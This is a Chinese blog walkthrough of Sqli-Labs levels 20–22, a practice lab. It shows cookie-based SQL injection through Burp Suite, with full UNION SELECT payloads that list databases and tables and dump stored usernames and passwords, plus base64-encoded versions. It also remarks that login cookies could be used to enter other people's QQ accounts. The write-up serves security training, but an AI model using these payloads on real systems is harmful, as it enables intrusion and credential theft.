Sqli-Labs less20-22

时间:2022-02-18 02:28:30

less-20

 

第20关成功登陆之后会产生一个cookie,作为下次登陆的凭证(可以用于登陆其他人的qq空间)

Sqli-Labs less20-22

 

 

 这里我依然使用burp suite,其实火狐和谷歌上有许多插件可以改http头和cookie(例如chrome工具: Cookie Editor),掌握一个即可

抓包后发送到repeater:

Sqli-Labs less20-22

 

 

 改cookie:uname=admin‘,报错,说明存在注入漏洞

Sqli-Labs less20-22

 

 

 

之后构造语句还是老步骤

查看列数:uname=‘ order by 4 # (注意闭合sql语句)

Sqli-Labs less20-22

 

 

 判断回显位置:uname=‘union select 1,2,3#

Sqli-Labs less20-22

 

 

 爆库:uname=‘union select 1,2,group_concat(schema_name)from information_schema.schemata#

Sqli-Labs less20-22

 

 

 爆表:uname=‘union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=‘security‘#

Sqli-Labs less20-22

 

 

 爆列:uname=‘union select 1,2,group_concat(column_name)from information_schema.columns where table_name=‘users‘#

Sqli-Labs less20-22

 

 

 爆信息:uname=‘union select 1,2,group_concat(concat_ws(‘-‘,username,password))from security.users#

Sqli-Labs less20-22

 

less-21

输入用户名密码登陆:

Sqli-Labs less20-22

 

 

 抓包观察数据:

Sqli-Labs less20-22

 

 

 可以看到cookie的内容变成加密的形式,百度后用base64加解密可以解决:

https://base64.us/

Sqli-Labs less20-22

 

 

 把我们需要输入的语句先进行一遍base64加密即可:

例如判断当前数据库:uname=‘)union select 1,2,database()#转义之后:

Sqli-Labs less20-22

 

 

 

Sqli-Labs less20-22

 

 

 除了闭合方式和加一步转码外,步骤与上一关完全一致,不再赘述。

 

less-22

本关抓包并测试发现数据格式变为“”,其他完全一样

 

“ union select 1,2,database()#转义:InVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=

 Sqli-Labs less20-22

 

 Sqli-Labs less20-22

 

 其他语句均相同!

 

 

 

1-22关为基础关,到此结束。